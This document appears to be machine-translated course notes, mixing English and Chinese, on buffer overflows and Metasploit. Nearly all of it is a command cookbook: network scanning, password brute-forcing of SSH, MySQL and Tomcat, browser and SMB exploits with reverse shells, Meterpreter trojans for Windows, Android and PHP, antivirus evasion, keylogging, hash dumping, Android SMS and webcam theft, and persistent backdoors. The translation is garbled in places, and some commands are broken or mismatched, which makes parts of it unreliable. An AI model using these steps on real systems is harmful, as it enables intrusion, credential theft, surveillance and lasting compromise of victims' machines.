Network security (nine buffer overflow && metasploit)

Means that the buffer overflow is provided a data storage capacity of more than a buffer, as poured into the cup as an excess of water.

May be understood more abstractly buffer memory area as read-write period,
the ultimate goal of the attack is desired buffer system to perform this read-write memory has been deliberately set of malicious code.

String manipulation functions using secure
write security code
input data validation (filtering)
pointer integrity checking
party software defense

---

Penetration attacks (exploit)
testers use loopholes in the system, program, or service attack of a process

Attack load (payload)
section attacker attacker's code is executed on the target system, change the code having a rebound connection, create a user, to perform the functions of other system commands

shellcode
period of machine instructions that run on the target machine, will return after successful execution of a shell

Module (Module1)
refers to a piece of software code components used in frame metasploit

Listener (listener)
listener is to wait for the assembly metasploit access network connection

Open the database service postgresql statr

Check database state service postgresql status

Run msfconsole

View the database connection status db_connect

Create a table workspace -a test

Delete table workspace - d test

Enter the test bench Wordspace test

Use nmap db_nmap -sS 192.168.80.1 scan host

Export scan results db_export 1.xml
import scan results db_import 1.xml

View scan results hosts

---

collect message

Open msfconsole

1. whois www.example.com
2. nslookup

use auxiliary / scanner / ip / ipidseq #IPID sequence scanner, and -sI nmap -O option is similar to the
Show Options
the SET rhosts 192.168.1.0/24
the SET RPORT 8080
the SET THREADS 50
RUN

nmap scanning the database connection
db_nmap -sS -A 192.168.2.123

db_services view scan results

使用portscan模块
search postscan
use auxiliary/scanner/postscan/syn
set RHOSTS 192.168.1.111
set THREADS 50
run

Smb_version specific scanning module:
use Auxiliary / Scanner / smb / smb_version find open port 445 ip
Show Options
the SET rhosts 192.168.1.111
the SET THREADS 50
RUN
db_hosts -c address, os_flavor

找mssql主机
use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run

E-mail address search site
search_email_collector
use Auxiliary / Gather / search_email_collector
the SET DOMAIN cracer.com (scanning domain)
RUN

ssh scan server
use Auxiliary / Scanner / ssh / ssh_version
SET rhosts 192.168.1.0/24
SET THREADS 50
RUN

telnet服务
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.1.0/24
set THREADS 50
run

ftp host scans
use Auxiliary / Scanner / ftp / ftp_version
Show Options
the SET rhosts 192.168.1.0/24
the SET THREADS 50
RUN

Sweep anonymous ftp login
use Auxiliary / Scanner / ftp / anonymos
Show Options
the SET rhosts 192.168.1.0/24
the SET THREADS 50
RUN

anonymous ftp login
login name: anonymous
Password: empty

Scan the local area network which hosts survived
use Auxiliary / Scanner / Discovery / arp_sweep
Show Options
the SET rhosts 192.168.1.0/24
the SET THREADS 50
RUN

Scan web directory (and does not scan files)
use Auxiliary / Scanner / HTTP / dir_scanner
Show Options
the SET rhosts 192.168.1.129
the SET THREADS 50
RUN

扫描SNMP主机
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS 192.168.1.0/24
set THREADS 50
run

Ethereal sniffer
use Auxiliary / Sniffer / psnuffle
RUN

---

Password blast

ssh密码
search ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.2.231
set PASS_FILE pass
set USERNAME root
exploit

telnet密码
search telnet_login
use auxiliray/scanner/telnet/telnet_login
show options
set RHOSTS 192.168.2.123
set FILE_PATH pass
set USERNAME administrator
exploit

samba攻击
use auxiliary/scanner/smb/smb_login
set RHOSTS 192.168.2.3
set PASS_FILE pass
set SMBUser administrator
set THREADS 50
exploit

mysql密码爆破
search mysql_login
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 192.168.1.32
set PASS_FILE pass
set USERNAME root
set THREADS 50
exploit

search postgresql_login
use auxiliary/scanner/postgres/postgres_login
show options
set RHOSTS 192.168.2.129
set PASS_FILE pass
set USERNAME postgres
exploit

tomcat攻击
search tomcat_mgr_login
show options
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.1.23
set PASS_FILE /root/pass.txt
set USER_FILE /root/user.txt
exploit

---

Exploit module

show targets displayed target (os version)

Set Target version set TARGET

began to exploit the vulnerability to attack

session -l lists the session

Select Session session -i

session -k session ends

The conversation in the background z

c session ends

show auxiliary display auxiliary module

use auxiliary module

set setup options

run run module

ms10_002
Search ms10_002
use exploit / Windows / Browser / ms10_002_aurora
Show Options
the SET SRVHOST 192.168.2.128 (malicious URL generation IP (can proxy))
the SET payload Windows / Meterpreter / reverse_tcp (bounce shell)
the SET SRVPORT 80 (bounce back to port)
the SET uripath /
SET lhost 192.168.2.128 (listening for address)
SET LPORT 1211 (for the listening port)
exploit

sessions -i (see if there is a session)

sessions -i 1 (selecting an ID, the session enters)
directly enter the shell can be obtained shell

ms10_018
search ms10_018
use exploit/windows/browser/ms10_018_ie_behaviors
show options
set SRVHOST 192.168.2.128
set SRVPORT 8081
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1211
exploit

sessions -i (see if there is a session)

sessions -i 1 (selecting an ID, into the session)

Because different payload, so this directly into the shell

ms12_020
Search ms12_020
use Auxiliary / Scanner / RDB / ms12_020_check (check for ms12_020 vulnerability)
Show Options
the SET rhosts 192.168.2.0/24
the SET THREADS 50

back

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
show options
set RHOST 192.168.2.132
run

ms10_046
search ms10_046
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
show options
set SRBHOST 192.168.2.128
set payload windows/shell/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1213
exploit

ms08_067
search ms08_067
use exploit/windows/smb/ms08_067_netapi
show options
set RHOST 192.168.2.131
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.128
set LPORT 1215
show target
set target 34
exploit

---

shellcode

windows

生成shellcode
msfpaylaod windows/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer.exe

监听shellcode
msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

linux

生成shellcode
msfpayload linux/x86/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/cracer


监听shellcode
msf
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

andriod

生成shellcode
msfpayload android/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 X > /root/Desktop/cracer.apk


监听shellcode
msf
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

dump_contacts   导出电话
dump_sms        导出信息
Webcam_list	摄像头数目
-i 1		后置摄像头
webcam_snap 	拍照
webcam_stream	开启摄像头

java

生成shellcode
msfpayload java/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1125 X > /root/Desktop/cracer.jar


监听shellcode
msf
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1125

将生成得shellcode上传到目标机上

exploit

将生成得cracer.jar运行起来：
	    Java -jar cracer.jar运行起来

php

成shellcode
msfpayload php/meterpreter/reverse_tcp LHOST 192.168.2.133 LPORT=1121 R > cracer.php


监听shellcode
msf
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.2.133   (地址要一致)
set LPORT 1121

将生成得shellcode上传到目标机上

exploit

---

shell free to kill to avoid killing

Using multiple编码Men杀
msfpayload windows / meterpreter / reverse_tcp LHOST 192.168.2.133 LPORT = 1211 R | msfencode -e x86 / shikata_ga_nai -c 5 -t raw | msfencode -e x86 / alpha_upper -c 2 -t raw | msfencode -e x86 / shikata_ga_nai -c 5 -t raw | msfencode -e x86 / countdown -c 5 -t exe -o /root/cc.exe

Packers free to kill
upx -5 cc.exe

veil free to kill

shellter free to kill tool
shellcode of injection tool
in some normal tools have injected a few holes, to achieve free to kill

1. First, to generate the Metasploit payload
   msfvenom -p Windows / Meterpreter / reverse_tcp lhost 1337 = -e = 192.168.1.3 LPORT the x86 / 43 is shikata_ga_nai -i -f -o RAW fud.raw
2. Perform wine shellter.exe run our shellter with red wine bottles,
3. Where A represents the automatic mode, PE target that we are ready to carry out pre-injection to avoid killing exe file location
4. Here we select the command to start the load input L, here we use meterpreter_reverse_tcp load, input 1
5. Enter the location of our rally shell, and then type the local port we need to listen, and here I chose 1355 as the listening port, enter directly generate
6. 启动Metasploit监听
   msfconsole
   use exploit/multi/handler
   set payload windows/meterpreter/reverse_tcp
   set lhost 192.168.1.3
   set lport 1355
   exploit
7. After starting to listen, to generate a file directory was placed on the main line to run under windows computer

---

After penetration

1. Create a trojan
msfpaylaod Windows / Meterpreter / reverse_tcp lhost 192.168.2.133 LPORT = X-1121> /root/cracer.exe
2. listening
use exploit / Multi / Handler
SET payload Windows / Meterpreter / reverse_tcp
SET lhost 192.168.2.133
SET LPORT 1233
exploit
Trojan on the target machine execution

3. Operation Command

You will have to generate screen capture screenshot picture into the main folder

Acquisition system run sysinfo platform

Get keyloggers
keyscan_start start
keyscan_dump output
keyscan_stop end

ps check process

migrate 1774 handover process (a successful invasion was to target the first thing is to get the process of switching to a stable, so that even if the program is shut down, will be controlled)

run post / windows / capture / keylog_recorder record keylogger

Get hash ---- hashdump

Log in using the hash
use exploit / Windwows / smb / PsExec
the SET payload windwos / metpreter / reverse_tcp
the SET lhost 192.168.2.133
the SET rhost 192.168.2.131 (target)
Show Options
the SET LPORT 1212
the SET smbuser Administrator obtain the hash can get these values smbpass smbuser
the SET asdasdqwsda1313 smbpass
Show Options
exploit

Process migration run post / windows / manage / migrate ( to switch to self-stabilization process)
RUN killav close cmd.exe
view target all traffic run packetrecorder -i 1
extract information systems run scraper

Lasting control of a PC (boot from Kai)
RUN Persistence -X 50 -i -p 1121 -r 192.168.2.133 (the goal was to write some registry data)

msfcosole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit
session -u 2 升级shell变成meterpreter

Permanent control server

msfpaylaod windows / meterpreter / reverse_tcp LHOST = 192.168.2.133 LPORT = 1127 X> /root/cracer.exe
generating payload on the destination machine to give

msfcosole
use exploit/multi/handler
set payload windows/meterpreter/metsvc_bin_tcp
set LPORT 1121
set LHOST 192.168.2.133
exploit

Run payload

run metsvc -A // permanent installation backdoor

After the restart
msfcosole
use exploit / Multi / Handler
the SET payload Windows / metsvc_bind_tcp
the SET rhost 192.168.2.132
the SET LPORT 31337 // get fixed port
exploit